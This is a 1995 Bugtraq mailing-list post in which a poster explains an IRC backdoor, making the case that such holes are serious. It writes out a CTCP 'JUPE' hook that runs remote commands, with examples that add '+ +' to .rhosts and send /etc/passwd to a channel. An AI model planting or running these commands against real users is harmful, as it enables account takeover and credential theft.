Bugtraq mailing list archives
Re: IRC Security Loophole
From: lwells () netcom com (Kernel Panic)
Date: Fri, 3 Feb 1995 18:30:53 -0800 (PST)
On Fri, 3 Feb 1995, Silicon Avatar wrote:
On Fri, 3 Feb 1995, Lorna Leong wrote:Hi, I read somewhere that there is a security loophole in IRC. I don't know anything else about it but I would like to find out more information about this. I heard that information about this IRC loophole can be found by FTP at ftp.cert.org, but I couldn't find anything relevant there.If you are talking about the "jupe" or "grok" hole. It was temporary, and merely hacked version of the client floating around at "trusted" sites. To my knowledge, these "hacks" have been removed and are no longer a threat (unless someone is propogating these older clients.) Simply put, you could "CTCP grok [command]" (CTCP being a method of communication over IRC) someone, and have that command executed, unknowingly, off the account.
No, IRC holes are a more serious threat than you give then credit for. For example, if I were to add to a script (or better yet make someone type) the following: /on ^ctcp "% % JUPE" $3- They would be just as much in my control as if they were on a hacked client. from this, you can do: /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts or /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd Theres more to IRC backdoors than making people say stupid stuff on a channel. I hope this example clears that up a little. /dev/kmem - This sig deleted for brevity -
Current thread:
- Re: MAGIC PIDs (was Re: magic??) robert owen thomas (Feb 02)
- Re: MAGIC PIDs (was Re: magic??) Neil Woods (Feb 02)
- IRC Security Loophole Lorna Leong (Feb 02)
- Re: IRC Security Loophole Mark (Feb 03)
- Re: IRC Security Loophole Silicon Avatar (Feb 03)
- Re: IRC Security Loophole Kernel Panic (Feb 03)
- Re: IRC Security Loophole Silicon Avatar (Feb 03)
- port checking under solaris 2.3? James W. Abendschan (Feb 02)